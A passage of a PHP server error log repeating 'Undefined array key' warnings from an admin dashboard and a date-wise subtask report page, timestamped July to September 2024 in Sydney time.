line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:20:02 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [15-Sep-2024 17:38:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 17:40:03 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 17:41:25 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 17:46:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 17:55:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 18:04:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 19:56:34 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 19:56:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 22:37:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 22:43:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 22:44:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [15-Sep-2024 22:44:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 14:10:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 14:11:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 16:29:52 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 17:45:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 18:11:51 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:23:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:25:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:26:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:26:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:27:01 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 19:27:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 21:18:22 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 21:23:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:11:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:29:59 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:32:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:34:45 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:37:09 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:39:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:43:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:43:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:43:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:43:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:50:11 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:50:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:54:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:54:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:57:47 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 22:59:57 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:00:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:14:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:21:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:28:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:30:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:44:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:44:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:46:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [16-Sep-2024 23:50:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:06:19 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:20 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:17:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:22:31 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:25:32 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:34:41 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:35:05 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:45:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 13:59:23 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:16:21 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:27:35 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:27:38 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:30:06 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 14:36:40 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 15:33:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [17-Sep-2024 17:37:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [18-Sep-2024 11:09:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Sep-2024 13:56:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [19-Sep-2024 15:06:49 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 11:27:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 12:43:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 13:02:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 15:27:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 15:29:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [20-Sep-2024 16:22:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [22-Sep-2024 23:21:36 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 01:27:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:27:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:30:37 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:31:28 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:32:39 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 03:35:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 09:33:27 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 11:13:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 12:19:13 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 12:48:02 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 13:29:08 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 13:39:29 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 14:09:46 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 14:54:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 15:44:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 16:23:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 16:27:18 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 17:16:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 17:47:15 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 18:20:54 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 18:33:30 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 23:37:07 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [23-Sep-2024 23:37:55 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 00:52:50 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 05:19:44 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 05:21:12 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 08:53:26 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 11:20:00 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 14:35:33 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 14:40:10 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:41:48 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:41:58 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:44:53 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/dashboard.php on line 26 [24-Sep-2024 15:52:44 